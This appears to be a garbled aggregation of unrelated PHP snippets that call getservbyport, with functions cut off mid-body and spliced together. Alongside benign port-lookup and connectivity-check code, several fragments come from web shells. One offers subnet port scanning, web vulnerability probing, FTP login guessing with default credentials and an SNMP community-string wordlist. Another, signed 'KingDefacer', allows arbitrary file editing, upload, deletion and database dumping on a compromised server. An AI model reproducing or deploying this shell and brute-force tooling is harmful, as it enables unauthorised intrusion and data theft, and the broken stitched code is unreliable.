function stat_block($summary, $stat, $num)
{
global $g, $gotlines, $fields;
uasort($summary[$stat], 'cmp');
print "<table width=\"200\" cellpadding=\"3\" cellspacing=\"0\" border=\"1\" summary=\"source destination ip\">";
print "<tr><th colspan=\"2\">{$fields[$stat]} " . gettext("data") . "</th></tr>";
$k = array_keys($summary[$stat]);
$total = 0;
$numentries = 0;
for ($i = 0; $i < $num; $i++) {
if ($k[$i]) {
$total += $summary[$stat][$k[$i]];
$numentries++;
$outstr = $k[$i];
if (is_ipaddr($outstr)) {
$outstr = "<a href=\"diag_dns.php?host={$outstr}\" title=\"" . gettext("Reverse Resolve with DNS") . "\"><img border=\"0\" src=\"/themes/{$g['theme']}/images/icons/icon_log.gif\" alt=\"log\" /></a> {$outstr}";
} elseif (substr_count($outstr, '/') == 1) {
list($proto, $port) = explode('/', $outstr);
$service = getservbyport($port, strtolower($proto));
if ($service) {
$outstr .= ": {$service}";
}
}
print "<tr><td>{$outstr}</td><td width=\"50\" align=\"right\">{$summary[$stat][$k[$i]]}</td></tr>";
}
}
$leftover = $gotlines - $total;
if ($leftover > 0) {
print "<tr><td>Other</td><td width=\"50\" align=\"right\">{$leftover}</td></tr>";
}
print "</table>";
}
public function indexAction()
{
if (isset($_GET['host']) and isset($_GET['port']) and isset($_GET['protocol'])) {
if (is_string($_GET['host']) and is_numeric($_GET['port']) and $_GET['port'] > 0 and in_array($_GET['protocol'], array('tcp', 'udp'))) {
sleep(1);
$connection = @fsockopen($_GET['protocol'] . '://' . $_GET['host'], $_GET['port'], $errno, $errstr, 1);
if (is_resource($connection)) {
stream_set_timeout($connection, 1);
}
if (is_resource($connection) and ($_GET['protocol'] == 'tcp' or fwrite($connection, "\n") and fread($connection, 1) != __FILE__ and $data = stream_get_meta_data($connection) and isset($data['timed_out']) and $data['timed_out'] == TRUE)) {
$service = getservbyport($_GET['port'], $_GET['protocol']);
if (!$service) {
$service = '<span style="cursor:help;" title="or unknown">hidden</span>';
} else {
$service = '<span style="cursor:help;" title="possibly maybe, or not">' . $service . '</span>';
}
die('<h3 style="font-weight:normal;display:none;"><b>' . $_GET['protocol'] . '</b>://<b>' . $_GET['host'] . '</b>:<b>' . $_GET['port'] . '</b> is <span style="color:green;"><u><b>opened</b></u></span> (service:' . $service . ')</h3>');
fclose($connection);
} else {
die('<h3 style="font-weight:normal;display:none;"><b>' . $_GET['protocol'] . '</b>://<b>' . $_GET['host'] . '</b>:<b>' . $_GET['port'] . '</b> is <span style="color:red;"><u><b>closed</b></u></span> (errno:<span style="cursor:help;" title="' . utf8_encode($errstr ? preg_replace('/^.*: +/', NULL, $errstr) : 'no error, no connection, nada') . '">' . $errno . '</span>)</h3>');
}
}
exit;
}
return $this->parseLayout('portscan');
}
function test_email()
{
$everythingisfine = 0;
echo "<pre>";
if (defined('SMTP_PWORD') && SMTP_PWORD != "******") {
if (!in_array('openssl', get_loaded_extensions())) {
die('<div style="color:red">you have to enable php_openssl in php.ini to use this service</div><br />');
} else {
echo "php_openssl in php.ini is enabled <br /><br />";
$everythingisfine = 1;
}
$host = SMTP_HOST;
$ports[] = SMTP_PORT;
foreach ($ports as $port) {
$connection = @fsockopen($host, $port);
if (is_resource($connection)) {
echo '<b>' . $host . ':' . $port . '</b> ' . '(' . getservbyport($port, 'ssl') . ') is open.<br /><br />' . "\n";
fclose($connection);
$everythingisfine = 1;
} else {
echo '<div style="color:red"><b>' . $host . ':' . $port . '</b> is not responding.</div><br /><br />' . "\n";
}
}
if ($everythingisfine && $_GET['to']) {
$emailDetails = SMTP_HOST . ":" . SMTP_PORT . " Username: "******"Testing SMTP Simple Email -" . time(), $emailDetails, '');
echo "SMTP Simple Email Respond: ";
print_r($response1);
echo "<br/><br/>";
} catch (Exception $e) {
echo 'Simple Email Caught exception: ', $e->getMessage(), "\n<br/>";
}
$this->Email->delivery = EMAIL_DELIVERY;
$this->Email->to = urldecode($_GET['to']);
$this->Email->subject = "Testing SMTP Template Email -" . time();
$this->Email->from = FROM_EMAIL;
$this->Email->template = 'test_email_template';
$this->Email->sendAs = 'html';
$this->set('message', $emailDetails);
try {
$response2 = $this->Sendgrid->sendgridsmtp($this->Email);
echo "<br/>SMTP Template Email Respond: ";
print_r($response2);
exit;
} catch (Exception $e) {
echo 'Template Email Caught exception: ', $e->getMessage(), "\n";
}
}
} else {
echo "Provide the details of SMTP email sending options in `app/Config/constants.php`";
}
exit;
}
public function apply($dbh, $matches, $term)
{
$result = false;
$params = $this->bindParams($matches, $term, 2);
if ($params !== false) {
$port = $params[0];
$proto = strtolower($params[1]);
$service = getservbyport($port, $proto);
$result = $service != false ? $service : "{$port}/{$proto}";
}
return $result;
}
/**
* Check if DB_PORT is open for DB_HOST
*/
function check_open_port($host, $port)
{
$connection = @fsockopen($host, $port);
if (is_resource($connection)) {
debug_msg($host . ':' . $port . ' ' . '(' . getservbyport($port, 'tcp') . ') port is open.');
fclose($connection);
return true;
} else {
debug_msg($host . ':' . $port . ' port is not responding.');
return false;
}
}
function formatVSPort($port, $plain_text = FALSE)
{
if ($port['proto'] == 'MARK') {
return 'fwmark ' . $port['vport'];
}
$proto = strtolower($port['proto']);
$name = $port['vport'] . '/' . $proto;
$srv = getservbyport($port['vport'], $proto);
if (!$plain_text && FALSE !== $srv) {
return '<span title="' . $name . '">' . $srv . '</span>';
} else {
return $name;
}
}
/**
* @param Mirasvit_Helpdesk_Model_Gateway $gateway
*
* @return string
*/
public function checkGateway($gateway)
{
$result = array();
$ports = array('gmail.com' => 80, $gateway->getHost() => $gateway->getPort());
foreach ($ports as $host => $port) {
$connection = @fsockopen($host, $port);
if (is_resource($connection)) {
$result[] = $host . ':' . $port . ' ' . '(' . getservbyport($port, 'tcp') . ') is open.';
fclose($connection);
} else {
$result[] = $host . ':' . $port . ' is closed.';
}
}
return implode('<br>', $result);
}
public function scan()
{
// TODO: verify that set_time_limit() is required
set_time_limit(0);
for ($index = $this->startPort; $index <= $this->endPort; $index++) {
echo "scanning port: {$index}<br/>";
flush();
// TODO: deal with exceptions thrown by fsockopen
$handle = fsockopen($this->hostIP, $index, $errno, $errstr, $this->timeout);
if ($handle) {
$service = getservbyport($index, "tcp");
$this->openPorts[$index] = "{$service}";
fclose($handle);
}
}
return $this->openPorts;
}
function build_port_info($portarr, $proto)
{
if (empty($portarr)) {
return '';
}
$ports = array();
asort($portarr);
foreach (array_reverse($portarr, TRUE) as $port => $count) {
$str = "";
$service = getservbyport($port, strtolower($proto));
$port = "{$proto}/{$port}";
if (!empty($service)) {
$port = "{$port} ({$service})";
}
$ports[] = "{$port}: {$count}";
}
return implode($ports, ', ');
}
public function scan()
{
// test scan and setup scanner parameters
echo "initial scan to determine network characteristics...<br/>";
flush();
$this->networkProbe();
// conduct the scan
for ($portNumber = $this->startPort; $portNumber <= $this->endPort; $portNumber++) {
if ($this->output == 1) {
echo "scanning port: {$portNumber}<br/>";
flush();
}
if ($this->scanPort($portNumber)) {
$service = getservbyport($portNumber, udp);
$this->openPorts[$portNumber] = $service;
}
}
$this->removeFalsePositives();
// return the detected open ports array
return $this->openPorts;
}
function do_scan_common_ports($ports)
{
$results = array();
$ip = $this->ip_add;
$wait = $this->wait;
$ctr = 0;
foreach ($ports as $port) {
if (!getservbyport($port, "tcp")) {
$pname = "";
} else {
$pname = getservbyport($port, "tcp");
}
$connection = @fsockopen($ip, $port);
if (is_resource($connection)) {
$status = "open";
fclose($connection);
} else {
$status = "closed";
}
$results[$ctr] = array("number" => (int) $port, "name" => $pname, "status" => $status);
$ctr++;
}
return $results;
}
function scanneR()
{
global $hcwd, $et;
if (!empty($_SERVER['SERVER_ADDR'])) {
$host = $_SERVER['SERVER_ADDR'];
} else {
$host = '127.0.0.1';
}
$udp = empty($_REQUEST['udp']) ? 0 : 1;
$tcp = empty($_REQUEST['tcp']) ? 0 : 1;
if (($udp || $tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])) {
$target = $_REQUEST['target'];
$from = (int) $_REQUEST['fromport'];
$to = (int) $_REQUEST['toport'];
$timeout = (int) $_REQUEST['timeout'];
$nu = 0;
echo '<font color=blue>Port scanning started against ' . htmlspecialchars($target) . ':<br>';
$start = time();
for ($i = $from; $i <= $to; $i++) {
if ($tcp) {
if (checkthisporT($target, $i, $timeout)) {
$nu++;
$ser = '';
if (getservbyport($i, 'tcp')) {
$ser = '(' . getservbyport($i, 'tcp') . ')';
}
echo "{$nu}) {$i} {$ser} (<a href='telnet://{$target}:{$i}'>Connect</a>) [TCP]<br>";
}
}
if ($udp) {
if (checkthisporT($target, $i, $timeout, 1)) {
$nu++;
$ser = '';
if (getservbyport($i, 'udp')) {
$ser = '(' . getservbyport($i, 'udp') . ')';
}
echo "{$nu}) {$i} {$ser} [UDP]<br>";
}
}
}
$time = time() - $start;
echo "Done! ({$time} seconds)</font>";
} elseif (!empty($_REQUEST['securityscanner'])) {
echo '<font color=blue>';
$start = time();
$from = $_REQUEST['from'];
$to = (int) $_REQUEST['to'];
$timeout = (int) $_REQUEST['timeout'];
$f = substr($from, strrpos($from, '.') + 1);
$from = substr($from, 0, strrpos($from, '.'));
if (!empty($_REQUEST['httpscanner'])) {
echo 'Loading webserver bug list...';
$buglist = whereistmP() . DIRECTORY_SEPARATOR . uniqid('BL');
$dl = downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db', $buglist);
if ($dl) {
$file = file($buglist);
echo 'Done! scanning started.<br><br>';
} else {
echo 'Failed!!! scanning started without webserver security testing...<br><br>';
}
} else {
$fr = htmlspecialchars($from);
echo "Scanning {$fr}.{$f}-{$fr}.{$to}:<br><br>";
}
for ($i = $f; $i <= $to; $i++) {
$output = 0;
$ip = "{$from}.{$i}";
if (!empty($_REQUEST['nslookup'])) {
$hn = gethostbyaddr($ip);
if ($hn != $ip) {
echo "{$ip} [{$hn}]<br>";
}
$output = 1;
}
if (!empty($_REQUEST['ipscanner'])) {
$port = $_REQUEST['port'];
if (strstr($port, ',')) {
$p = explode(',', $port);
} else {
$p[0] = $port;
}
$open = $ser = '';
foreach ($p as $po) {
$scan = checkthisporT($ip, $po, $timeout);
if ($scan) {
$ser = '';
if ($ser = getservbyport($po, 'tcp')) {
$ser = "({$ser})";
}
$open .= " {$po}{$ser} ";
}
}
if ($open) {
echo "{$ip}) Open ports:{$open}<br>";
$output = 1;
}
}
if (!empty($_REQUEST['httpbanner'])) {
$res = get_sw_namE($ip, $timeout);
if ($res) {
echo "{$ip}) Webserver software: ";
if ($res == -1) {
echo 'Unknow';
} else {
echo $res;
}
echo '<br>';
$output = 1;
}
}
if (!empty($_REQUEST['httpscanner'])) {
if (checkthisporT($ip, 80, $timeout) && !empty($file)) {
$admin = array('/admin/', '/adm/');
$users = array('adm', 'bin', 'daemon', 'ftp', 'guest', 'listen', 'lp', 'mysql', 'noaccess', 'nobody', 'nobody4', 'nuucp', 'operator', 'root', 'smmsp', 'smtp', 'sshd', 'sys', 'test', 'unknown', 'uucp', 'web', 'www');
$nuke = array('/', '/postnuke/', '/postnuke/html/', '/modules/', '/phpBB/', '/forum/');
$cgi = array('/cgi.cgi/', '/webcgi/', '/cgi-914/', '/cgi-915/', '/bin/', '/cgi/', '/mpcgi/', '/cgi-bin/', '/ows-bin/', '/cgi-sys/', '/cgi-local/', '/htbin/', '/cgibin/', '/cgis/', '/scripts/', '/cgi-win/', '/fcgi-bin/', '/cgi-exe/', '/cgi-home/', '/cgi-perl/');
foreach ($file as $v) {
$vuln = array();
$v = trim($v);
if (!$v || $v[0] == '#') {
continue;
}
$v = str_replace('","', '^', $v);
$v = str_replace('"', '', $v);
$vuln = explode('^', $v);
$page = $cqich = $nukech = $adminch = $userch = $vuln[1];
if (strstr($page, '@CGIDIRS')) {
foreach ($cgi as $cg) {
$cqich = str_replace('@CGIDIRS', $cg, $page);
$url = "http://{$ip}{$cqich}";
$res = check_urL($url, $vuln[3], $vuln[2], $timeout);
if ($res) {
$output = 1;
echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
}
}
} elseif (strstr($page, '@ADMINDIRS')) {
foreach ($admin as $cg) {
$adminch = str_replace('@ADMINDIRS', $cg, $page);
$url = "http://{$ip}{$adminch}";
$res = check_urL($url, $vuln[3], $vuln[2], $timeout);
if ($res) {
$output = 1;
echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
}
}
} elseif (strstr($page, '@USERS')) {
foreach ($users as $cg) {
$userch = str_replace('@USERS', $cg, $page);
$url = "http://{$ip}{$userch}";
$res = check_urL($url, $vuln[3], $vuln[2], $timeout);
if ($res) {
$output = 1;
echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
}
}
} elseif (strstr($page, '@NUKE')) {
foreach ($nuke as $cg) {
$nukech = str_replace('@NUKE', $cg, $page);
$url = "http://{$ip}{$nukech}";
$res = check_urL($url, $vuln[3], $vuln[2], $timeout);
if ($res) {
$output = 1;
echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
}
}
} else {
$url = "http://{$ip}{$page}";
$res = check_urL($url, $vuln[3], $vuln[2], $timeout);
if ($res) {
$output = 1;
echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
}
}
}
}
}
if (!empty($_REQUEST['smtprelay'])) {
if (checkthisporT($ip, 25, $timeout)) {
$res = '';
$res = checksmtP($ip, $timeout);
if ($res == 1) {
echo "{$ip}) SMTP relay found.<br>";
$output = 1;
}
}
}
if (!empty($_REQUEST['snmpscanner'])) {
if (checkthisporT($ip, 161, $timeout, 1)) {
$com = $_REQUEST['com'];
$coms = $res = '';
if (strstr($com, ',')) {
$c = explode(',', $com);
} else {
$c[0] = $com;
}
foreach ($c as $v) {
$ret = snmpchecK($ip, $v, $timeout);
if ($ret) {
$coms .= " {$v} ";
}
}
if ($coms != '') {
echo "{$ip}) SNMP FOUND: {$coms}<br>";
$output = 1;
}
}
}
if (!empty($_REQUEST['ftpscanner']) && function_exists('ftp_connect')) {
if (checkthisporT($ip, 21, $timeout)) {
$usps = explode(',', $_REQUEST['userpass']);
foreach ($usps as $v) {
$user = substr($v, 0, strpos($v, ':'));
$pass = substr($v, strpos($v, ':') + 1);
if ($pass == '[BLANK]') {
$pass = '';
}
$ftp = ftp_connect($ip, 21, $timeout);
if ($ftp) {
if (ftp_login($ftp, $user, $pass)) {
$output = 1;
echo "{$ip}) FTP FOUND: ({$user}:{$pass}) System type: " . ftp_systype($ftp) . " (<b><a href='";
echo hlinK("seC=ftpc&workingdiR=" . getcwd() . "&hosT={$ip}&useR={$user}&pasS={$pass}");
echo "' target='_blank'>Connect</a></b>)<br>";
}
}
}
}
}
if ($output) {
echo '<hr size=1 noshade>';
}
}
$time = time() - $start;
echo "Done! ({$time} seconds)</font>";
if (!empty($buglist)) {
unlink($buglist);
}
} elseif (!empty($_REQUEST['directoryscanner'])) {
$dir = file($_REQUEST['dic']);
$host = $_REQUEST['host'];
$r = $_REQUEST['r1'];
echo "<font color=blue><pre>Tahap Scanning Dimulai ...\n";
for ($i = 0; $i < count($dir); $i++) {
$d = trim($dir[$i]);
if ($r) {
$adr = "http://{$host}/{$d}/";
if (check_urL($adr, 'GET', '302')) {
echo "Directory Found: <a href='{$adr}' target='_blank'>{$adr}</a>\n";
}
} else {
$adr = "{$d}.{$host}";
$ip = gethostbyname($adr);
if ($ip != $adr) {
echo "Subdomain Found: <a href='http://{$adr}' target='_blank'>{$adr}({$ip})</a>\n";
}
}
}
echo 'Done!</pre></font>';
} else {
$t = "<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='50%'><tr><form method='POST'";
$chbox = extension_loaded('sockets') ? "<input type=checkbox style='border-width:1px;background-color:#808080;' name=tcp value=1 checked>TCP<input type=checkbox name=udp style='border-width:1px;background-color:#808080;' value=1 checked>UDP" : "<input type=hidden name=tcp value=1>";
echo "<center>{$t}><td>Port scanner:</td></tr><td width='25%' bgcolor='#808080'>Target:</td><td bgcolor='#808080' width=80%><input name=target value={$host} size=40></td></tr><tr><td bgcolor='#666666' width=25%>From:</td><td bgcolor='#666666' width=25%><input name=fromport type=text value='1' size=5></td></tr><tr><td bgcolor='#808080' width=25%>To:</td><td bgcolor='#808080' width=25%><input name=toport type=text value='1024' size=5></td></tr><tr><td width='25%' bgcolor='#666666'>Timeout:</td><td bgcolor='#666666'><input name=timeout type=text value='2' size=5></td><tr><td width='25%' bgcolor='#808080'>{$chbox}</td><td bgcolor='#808080' align='right'>{$hcwd}<input type=submit class=buttons name=portscanner value=Scan></form>{$et}{$t}><td>Discoverer:</td></tr><tr><td width='25%' bgcolor='#808080'>Host:</td><td bgcolor='#808080' width=80%><input name=host value='" . $_SERVER["HTTP_HOST"] . "' size=40></td><td bgcolor='#808080'></td></tr><tr><td width='25%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666' width=80%><input name=dic size=40></td><td bgcolor='#666666'></td></tr><tr><td width='25%' bgcolor='#808080'>Search for:</td><td bgcolor='#808080' width=40%><input type=radio value=1 checked name=r1>Directories<input type=radio name=r1 value=0>Subdomains</td><td bgcolor='#808080' align='right' width=40%><input type=submit class=buttons name=directoryscanner value=Scan></td></form></tr></table>";
$host = substr($host, 0, strrpos($host, "."));
echo "{$t} name=security><td>Security scanner:</td></tr><td width='25%' bgcolor='#808080'>From:</td><td bgcolor='#808080' width=80%><input name=from value={$host}.1 size=40> <input type=checkbox value=1 style='border-width:1px;background-color:#808080;' name=nslookup checked>NS lookup</td></tr><tr><td bgcolor='#666666' width=25%>To:</td><td bgcolor='#666666' width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>{$hcwd}</td></tr><tr><td width='25%' bgcolor='#808080'>Timeout:</td><td bgcolor='#808080'><input name=timeout type=text value='2' size=5></td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ipscanner value=1 checked onClick='document.security.port.disabled = !document.security.port.disabled;' style='border-width:1px;background-color:#666666;'>Port scanner:</td><td bgcolor='#666666'><input name=port type=text value='21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=httpbanner value=1 checked style='border-width:1px;background-color:#808080;'>Get web banner</td><td bgcolor='#808080'><input type=checkbox name=httpscanner value=1 checked style='border-width:1px;background-color:#808080;'>Webserver security scanning <input type=checkbox name=smtprelay value=1 checked style='border-width:1px;background-color:#808080;'>SMTP relay check</td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ftpscanner value=1 checked onClick='document.security.userpass.disabled = !document.security.userpass.disabled;' style='border-width:1px;background-color:#666666;'>FTP password:</td><td bgcolor='#666666'><input name=userpass type=text value='anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=snmpscanner value=1 onClick='document.security.com.disabled = !document.security.com.disabled;' checked style='border-width:1px;background-color:#808080;'>SNMP:</td><td bgcolor='#808080'><input name=com type=text value='public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,sun,agent,manager,ibm,hello,switch,solaris,OrigEquipMfr,default,world,tech,mngt,tivoli,openview,community,snmp,SNMP,none,snmpd,Secret C0de,netman,security,pass,passwd,root,access,rmon,rmon_admin,hp_admin,NoGaH\$@!,router,agent_steal,freekevin,read,read-only,read-write,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,IBM,apc,TENmanUFactOryPOWER,proxy,core,CISCO,regional,1234,2read,4changes' size=60></td></tr><tr><td width='25%' bgcolor='#666666'></td><td bgcolor='#666666' align='right'><input type=submit class=buttons name=securityscanner value=Scan></form>{$et}";
}
}
}
echo "</center></form></td></tr><tr><td>\n<center><b><font size='2' face='Verdana'>:: Edit File ::<br></font></b>\n<form method='post' action=''>\n<input type='text' name='editfile' value=" . $dir . ">\n<input type='submit' value='Go' name='doedit'>\n</form>";
// Edit Files n3xpl0rer
if (isset($_POST['doedit']) && $_POST['editfile'] != $dir) {
$file = $_POST['editfile'];
$content = file_get_contents($file);
echo "<form action='' method='post'><center>\n<input type='hidden' name='editfile' value='" . $file . "'>\n<textarea rows=20 cols=80 name='newtext'>" . htmlspecialchars($content) . "</textarea><br /><input type='submit' name='edit' value='Edit'></form>";
}
if (isset($_POST['edit'])) {
$file = $_POST['editfile'];
echo $file . "<br />";
$fh = fopen($file, "w+") or die("<font color=red>Error: cannot open file</font>");
fwrite($fh, stripslashes($_POST['newtext'])) or die("<font color=red>Error: cannot write to file</font>");
fclose($fh);
echo "Done.</td></tr>";
}
echo "\n</table>\n<table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'>\n<tr>\n<td valign=top>\n<center><b><font size='2' face='Verdana'>Dizin'e Git:<br></font></b>\n<form name='directory' method='post' action=''>\n<input type='text' name='dir' value={$dir}>\n<input type='submit' value='Go'>\n</form></td><td>\n<center><b><font size='2' face='Verdana'> Port Tarayýcý <br></font></b>\n <form name='scanner' method='post'>\n <input type='text' name='host' value='127.0.0.1' >\n <select name='protocol'>\n <option value='tcp'>tcp</option>\n <option value='udp'>udp</option>\n </select>\n <input type='submit' value='Portlarý TARA'>\n </form>\n";
if (isset($host) && isset($proto)) {
echo "<font size='2' face='Verdana'>Open Ports:";
for ($current = 0; $current <= 23; $current++) {
$currents = $myports[$current];
$service = getservbyport($currents, $proto);
// Try to connect to port
$result = fsockopen($host, $currents, $errno, $errstr, 1);
// Show results
if ($result) {
echo "{$currents}, ";
}
}
}
echo "</font>\n</td></tr>\n\n<tr>\n<td valign=top width=50%>\n<center><b><font size='2' face='Verdana'>Dosya Upload<br></font></b>\n <form method='post' action='' enctype='multipart/form-data'>\n <input type='hidden' name='dare' value={$dir}>\n <input type='file' name='ffile'>\n <input type='submit' name='ok' value='Upload!'>\n </center> \n </form>\n</td>\n<td valign=top>\n<center><b><font size='2' face='Verdana'>Dosya Sil<br></font></b>\n <form method='post' action=''>\n <input type='text' name='delete' value={$dir} > <input type='submit' value='Dosyayý Sil' name='deletfilez'>\n </center>\n </form>\n</td></tr>\n<tr>\n<td valign=top>\n \n<center><b><font size='2' face='Verdana'>Klasör Oluþtur<br></font></b>\n <form method='post' action=''>\n <input type='text' name='makedir' value={$dir}> <input type='submit' value='Oluþtur'>\n </center>\n </form>\n</td>\n<td valign=top>\n<center><b><font size='2' face='Verdana'>Klasör Sil<br></font></b>\n <form method='post' action=''>\n <input type='text' name='deletedir' value={$dir}> <input type='submit' value='Sil'>\n </center>\n </form>\n</td></tr>\n<tr>\n<td valign=top width=50%>\n<center><b><font size='2' face='Verdana'>Dosya Oluþtur:<br></font></b>\n <form method='post' action=''>\n <input type='hidden' name='darezz' value={$dir}>\n <font size='1' face='Verdana'>ADI:</font><br>\n <input type='text' name='names' size='30'><br>\n <font size='1' face='Verdana'>Kodu:</font><br>\n <textarea rows='16' cols='30' name='source'></textarea><br>\n <input type='submit' value='Upload'>\n </center>\n </form>\n</td>\n<td valign=top width=50%>\n<center><b><font size='2' face='Verdana'>Database<br></font></b>\n <form method='post' action=''>\n <font size='1' face='Verdana'>Username: - Password:</font><br>\n <input type='text' name='user' size='10'>\n <input type='text' name='passd' size='10'><br>\n <font size='1' face='Verdana'>Host:</font><br>\n <input type='text' name='host' value='localhost'><br>\n <font size='1' face='Verdana'>DB Name:</font><br>\n <input type='text' name='db'><br>\n <font size='1' face='Verdana'>Sorgu:</font><br>\n <textarea rows='10' cols='30' name='query'></textarea><br>\n <input type='submit' value='Sorguyu Calistir' name='godb'><br><input type='submit' name='dump' value='Database'yi Dump Et'>\n </center>\n </form>\n</td> </tr>\n\n</table>\n</table>\n<br />\n<table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'>\n<tr>\n<td valign=top>\n<center><b><font size='1' face='Verdana'>\nKingDefacer@msn.com\n</center></font></td></tr>\n</body>\n</html>";
}
}
flusheR();
if (!empty($_REQUEST['ipscanner'])) {
$port = $_REQUEST['port'];
if (strstr($port, ",")) {
$p = explode(",", $port);
} else {
$p[0] = $port;
}
$open = $ser = "";
foreach ($p as $po) {
$scan = checkthisporT($ip, $po, $timeout);
if ($scan) {
$ser = "";
if ($ser = getservbyport($po, "tcp")) {
$ser = "({$ser})";
}
$open .= " {$po}{$ser} ";
}
}
if ($open) {
echo "{$ip}) Open ports:{$open}<br>";
$output = 1;
}
flusheR();
}
if (!empty($_REQUEST['httpbanner'])) {
$res = get_sw_namE($ip, $timeout);
if ($res) {
echo "{$ip}) Webserver software: ";
function portscan($host)
{
global $port;
echo "<table BORDER=1 align=center>";
echo "<tr><td alling=center>Host: </td><td alling=center><b><font color=green> " . $host . " </b></font></td></tr>";
for ($i = 1; $i <= 65535; $i++) {
$fp = fsockopen($host, $i, $errno, $errstr, 4);
if ($fp) {
fclose($fp);
if (isset($port[$i])) {
$k = $port[$i];
} else {
$k = getservbyport($i, "TCP");
}
if ($k == "") {
$k = "N\\A";
}
echo "<tr><td alling=center>Port: " . $i . " </td><td alling=center><b><font color=green>" . $k . "</b></font></td>";
echo "</tr>";
}
}
echo "</table>";
}
$sr[] = $sw[] = $se[] = $sh;
$ss[$sh] = $p;
}
if (@socket_select($sr, $sw, $se, 2)) {
foreach ($sw as $sn => $sh) {
if (!empty($ss[$sh])) {
@socket_write($sh, "HELLO\r\n\r\n");
$sr[] = $sh;
}
}
foreach ($sr as $sn => $sh) {
if (!empty($ss[$sh])) {
$a = @socket_read($sh, 255);
@socket_shutdown($sh, 2);
@socket_close($sh);
echo '<tr><td align="right">', $ss[$sh], '</td><td>', ($s = @getservbyport($ss[$sh], 'tcp')) == '' ? 'unknown' : $s, '</td><td>', nl2br(escHTML($a)), '</td></tr>';
@flush();
unset($sr[$sn], $ss[$sh], $sw[$sh]);
}
}
foreach ($se as $sn => $sh) {
if (!empty($ss[$sh])) {
@socket_shutdown($sh, 2);
@socket_close($sh);
unset($se[$sn], $ss[$sh]);
}
}
}
}
echo '</table>';
} else {
<?php
ftp_connect('my.ftphost.com', 21);
maxdb_real_connect($link, $hostname, $username, $passwd, $dbname, '8080');
ftp_ssl_connect('my.ftphost.com', $port);
getservbyport(PORT);
strtolower(21);
strtoupper($port);
function stat_block($summary, $stat, $num)
{
global $g, $gotlines, $fields;
uasort($summary[$stat], 'cmp');
print '<div class="table-responsive">';
print '<table class="table table-striped table-hover table-condensed">';
print '<tr><th>' . $fields[$stat] . '</th>' . '<th>' . gettext("Data points") . '</th><th></th></tr>';
$k = array_keys($summary[$stat]);
$total = 0;
$numentries = 0;
for ($i = 0; $i < $num; $i++) {
if ($k[$i]) {
$total += $summary[$stat][$k[$i]];
$numentries++;
$outstr = $k[$i];
if (is_ipaddr($outstr)) {
print '<tr><td>' . $outstr . '</td>' . '<td>' . $summary[$stat][$k[$i]] . '</td><td><a href="diag_dns.php?host=' . $outstr . '" class="btn btn-xs btn-success" title="' . gettext("Reverse Resolve with DNS") . '">Lookup</a></td></tr>';
} elseif (substr_count($outstr, '/') == 1) {
list($proto, $port) = explode('/', $outstr);
$service = getservbyport($port, strtolower($proto));
if ($service) {
$outstr .= ": {$service}";
}
}
if (!is_ipaddr($outstr)) {
print '<tr><td>' . $outstr . '</td><td>' . $summary[$stat][$k[$i]] . '</td><td></td></tr>';
}
}
}
$leftover = $gotlines - $total;
if ($leftover > 0) {
print "<tr><td>Other</td><td>{$leftover}</td><td></td>";
}
print "</table>";
print '</div>';
}
/**
* Get name of the service that is listening on a certain port.
*
* @param integer $port Portnumber
* @param string $protocol Protocol (Is either tcp or udp. Default is tcp.)
*
* @access public
*
* @return string Name of the Internet service associated with $service
*/
public function getService($port)
{
return @getservbyport($port, strtolower($this->typePort));
}
<?php
if (file_exists("/etc/services")) {
$file = "/etc/services";
} elseif (substr(PHP_OS, 0, 3) == "WIN") {
$file = "C:/WINDOWS/system32/drivers/etc/services";
} else {
die(PHP_OS . " unsupported");
}
if (file_exists($file)) {
$services = file_get_contents($file);
$service = getservbyport(80, "tcp");
if (preg_match("/{$service}\\s+80\\/tcp/", $services)) {
echo "PASS\n";
}
} else {
echo "Services file not found in expected location\n";
}
public function serviceName(int $port, string $protocol) : string
{
return getservbyport($port, $protocol);
}
function do_scan()
{
/* Loop through ip addresses.
This is why ip addresses are stored as long numbers as apposed
to Internet Protocol dotted addresses */
for ($this->current_ip = $this->start_ip; $this->current_ip <= $this->stop_ip; $this->current_ip++) {
/* convert the long number back to a dotted address */
$ip = long2ip($this->current_ip);
/* loop through the ports and check each */
foreach ($this->ports as $key => $port) {
/* for unix systems, this will obtain the name of the service running
on that port. Win32 systems will just return N/A. */
if (!getservbyport($port, "tcp")) {
$pname = "N/A";
} else {
$pname = getservbyport($port, "tcp");
}
/* attempt to open a socket to the port at the current ip address */
$ptcp = fsockopen($ip, $port, &$errno, &$errstr, $this->wait);
if ($ptcp) {
$status = 1;
} else {
$status = 0;
}
/* return 0 for closed port (so users can display their own message */
/* return the results in a structured multi-dimensioned array
so the user can choose how to display the results */
$results["{$ip}"]["{$port}"]["pname"] = "{$pname}";
$results["{$ip}"]["{$port}"]["status"] = "{$status}";
/* start the delay before moving on to the next port */
$this->do_delay($this->delay);
}
}
/* returnt the results to the user */
return $results;
}
<?php echo "Port 80's default service is: " . getservbyport(80, "tcp");
/**
* Get name of the service that is listening on a certain port.
*
* @access public
* @param integer Portnumber
* @param string Protocol (Is either tcp or udp. Default is tcp.)
* @return string Name of the Internet service associated with $service
*/
